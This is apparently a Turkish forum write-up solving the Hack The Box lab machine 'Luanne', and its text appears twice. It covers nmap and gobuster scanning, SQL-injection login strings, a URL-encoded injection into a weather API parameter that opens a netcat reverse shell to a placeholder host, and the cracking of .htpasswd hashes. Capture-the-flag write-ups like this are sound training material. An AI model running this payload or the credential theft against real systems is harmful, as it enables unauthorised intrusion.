Makine Adı: Luanne
Zorluk: Kolay
OS: Linux
Link:https://www.hackthebox.eu/home/machines/profile/302
NOT:hackthebox üzerinden verilen ipleri /etc/hosts dizinine kaydedildiği varsayılarak yazılmıştır.
-NMAP TARAMASI-
kodu ile taramamızı başaltıyoruzhttps://www.hackthebox.eu/home/machines/profile/302
nmap çıktısı aşağıdaki fotoğraftaki gibidir.
her zamanki gibi sadeceshh ve http portlarının açık olduğunu görüyoruz.
http portunda ne olduğu görebilmek için tarayıcımıza "luanne.htb" yazarak sayfayı açmayı deniyoruz
karşımıza bir login formu geliyor.
böyle bir durumda yapabileceğimiz bir kaç şey bulunmakta
1. SQL injection denemek
2.Bruteforce ile şifreyi kırmayı denemek
3. Başka yöntemler denemek
1. SQL injection denemek
kullanıcı adı ve şifre bölümlerine
" or ""="
105 OR 1=1
gibi sqlinjection'ı tetikleyen metinleri girerek giriş yapmayı deniyoruz Bu metinleri internet üzerinden "SQL Injection codes" yazarak ulaşabilirsiniz (En altta örnek link bırakacağım)
her denediğimiz şifre için "401 Unauthorized" hatasını alıyoruz. Kısaca sitenin sql injection açığı olmadığını anlıyoruz.
2. Brute Force ile şifreyi kırmak
bu şekilde bir işlem günlerce belki aylarca zaman alacağı için direk bu işlemi atlıyorum.
3. Başka Yöntemler Denemek
hemen hemen her sitede bulunan robots.txt dosyasına bakıyoruz
robots.txt dosyasına göre /weather diye bir dizin var fakat 404 erişim hatası veriyor. Biz yine de bu dizine giriyoruz. fakat sonuç aynı :uzgun1
altdizinleri öğrenmek için kullanılan araçlardan biri de gobusterdır. Gobuster içerisinde wordlistleri yüklü olarak gelen altdizinlerin keşfi için kullanılan bruteforce(deneme yanılma yoluyla altdizinleri keşfettiği için bu şekilde dedim) aracıdır. Altdizin taraması aşağıda veridiğim kod ile taramayı başlatıyoruz
/weather dizininin altında /forecast isimli bir dizin/dosya daha bulduk.
http://luanne.htb/weather/forecast şeklinde giriş yapıyoruz.
karşımıza bir veritabanı (json) yönetim sayfası cıkıyor
bu sayfa url'i üzerinden backdoor çalıştırıyoruz.
(url encoded hali)
yukardaki backdoor kodunu
http://luanne.htb/weather/forecast?city=London'ın ynaına yağıştırıyoruz son link bu şekilde olacak
bu sırada terminalimizden
kodu ile bilgisayarımızı dinlemeye alıyoruz.
buradaki .htpasswd dizinin okuyarak kullanıcı adını ve şifreyi elde ediyoruz fakat şifre encrpyt edildiği için decrpyt etmemiz gerekiyor
ve şifreyi bu şekilde buluyoruz.
içerde biraz gezindikten sonra bir .htpasswd dizinini görüyoruz ve bunun da şifresini kırıyoruz.
arından erişip sağlayıp root ve user flaglerini hackthebox'a gönderiyoruz.
SQL Injection link = https://www.w3schools.com/sql/sql_injection.asp
Zorluk: Kolay
OS: Linux
Link:https://www.hackthebox.eu/home/machines/profile/302
NOT:hackthebox üzerinden verilen ipleri /etc/hosts dizinine kaydedildiği varsayılarak yazılmıştır.
-NMAP TARAMASI-
Kod:
sudo nmap -vv -A luanne.htb
kodu ile taramamızı başaltıyoruzhttps://www.hackthebox.eu/home/machines/profile/302
nmap çıktısı aşağıdaki fotoğraftaki gibidir.
her zamanki gibi sadeceshh ve http portlarının açık olduğunu görüyoruz.
http portunda ne olduğu görebilmek için tarayıcımıza "luanne.htb" yazarak sayfayı açmayı deniyoruz
karşımıza bir login formu geliyor.
böyle bir durumda yapabileceğimiz bir kaç şey bulunmakta
1. SQL injection denemek
2.Bruteforce ile şifreyi kırmayı denemek
3. Başka yöntemler denemek
1. SQL injection denemek
kullanıcı adı ve şifre bölümlerine
" or ""="
105 OR 1=1
gibi sqlinjection'ı tetikleyen metinleri girerek giriş yapmayı deniyoruz Bu metinleri internet üzerinden "SQL Injection codes" yazarak ulaşabilirsiniz (En altta örnek link bırakacağım)
her denediğimiz şifre için "401 Unauthorized" hatasını alıyoruz. Kısaca sitenin sql injection açığı olmadığını anlıyoruz.
2. Brute Force ile şifreyi kırmak
bu şekilde bir işlem günlerce belki aylarca zaman alacağı için direk bu işlemi atlıyorum.
3. Başka Yöntemler Denemek
hemen hemen her sitede bulunan robots.txt dosyasına bakıyoruz
robots.txt dosyasına göre /weather diye bir dizin var fakat 404 erişim hatası veriyor. Biz yine de bu dizine giriyoruz. fakat sonuç aynı :uzgun1
altdizinleri öğrenmek için kullanılan araçlardan biri de gobusterdır. Gobuster içerisinde wordlistleri yüklü olarak gelen altdizinlerin keşfi için kullanılan bruteforce(deneme yanılma yoluyla altdizinleri keşfettiği için bu şekilde dedim) aracıdır. Altdizin taraması aşağıda veridiğim kod ile taramayı başlatıyoruz
Kod:
gobuster dir -u http://luanne.htb/weather -w /usr/share/wordlists/dirb/big.txt -x .php, .txt -e
/weather dizininin altında /forecast isimli bir dizin/dosya daha bulduk.
http://luanne.htb/weather/forecast şeklinde giriş yapıyoruz.
karşımıza bir veritabanı (json) yönetim sayfası cıkıyor
bu sayfa url'i üzerinden backdoor çalıştırıyoruz.
Kod:
[COLOR=white]%27%29%3Bos.execute%28%22rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%20YOURIP%20YOURPORT%20%3E%2Ftmp%2Ff%22%29--[/COLOR]
yukardaki backdoor kodunu
http://luanne.htb/weather/forecast?city=London'ın ynaına yağıştırıyoruz son link bu şekilde olacak
Kod:
http://luanne.htb/weather/forecast?city=London[COLOR=white][COLOR=white][COLOR=white][COLOR=yellowgreen][COLOR=white]%27%29%3Bos.execute%28%22rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%20YOURIP%20YOURPORT%20%3E%2Ftmp%2Ff%22%29--[/COLOR][/COLOR][/COLOR][/COLOR][/COLOR]
bu sırada terminalimizden
Kod:
nc -lvnp 1234
buradaki .htpasswd dizinin okuyarak kullanıcı adını ve şifreyi elde ediyoruz fakat şifre encrpyt edildiği için decrpyt etmemiz gerekiyor
ve şifreyi bu şekilde buluyoruz.
içerde biraz gezindikten sonra bir .htpasswd dizinini görüyoruz ve bunun da şifresini kırıyoruz.
arından erişip sağlayıp root ve user flaglerini hackthebox'a gönderiyoruz.
SQL Injection link = https://www.w3schools.com/sql/sql_injection.asp